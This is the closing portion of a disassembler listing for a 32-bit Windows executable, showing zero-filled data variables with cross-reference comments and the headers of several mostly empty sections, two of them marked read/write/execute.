dd 40h dup(0)
dword_460E84 dd 0 ; sub_416DE3+12B�w ...
dword_460E88 dd 0 ; sub_413BAF+5�r ...
dword_460E8C dd 0 ; sub_41357B+259�r ...
dword_460E90 dd 0 ; sub_41357B+310�w ...
dword_460E94 dd 0 ; sub_41357B+22C�r ...
dword_460E98 dd 0 ; sub_413550�r ...
dword_460E9C dd 0 ; sub_413550+8�r ...
dword_460EA0 dd 0 ; sub_410C83+21�r ...
dword_460EA4 dd 0 ; seg000:00417511�r
dword_460EA8 dd 0 ; sub_41A1B6�r
dword_460EAC dd 0 ; sub_4171A7+11�w ...
dword_460EB0 dd 0 ; sub_411613:loc_411655�r ...
dword_460EB4 dd 0 ; sub_411613+C�r ...
byte_460EB8 db 0 ; DATA XREF: seg000:0041AFC9�r
; seg000:0041AFD2�w
align 200h
seg002 ends
; Section 4. (virtual address 00061000)
; Virtual size : 0001B000 ( 110592.)
; Section size in file : 0001B000 ( 110592.)
; Offset to raw data for section: 00061000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 461000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 6C00h dup(0)
_data ends
; Section 5. (virtual address 0007C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0007C000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_adata segment para public 'CODE' use32
assume cs:_adata
;org 47C000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 400h dup(0)
_adata ends
; Section 6. (virtual address 0007D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0007D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 47D000h
align 2000h
_idata2 ends
end start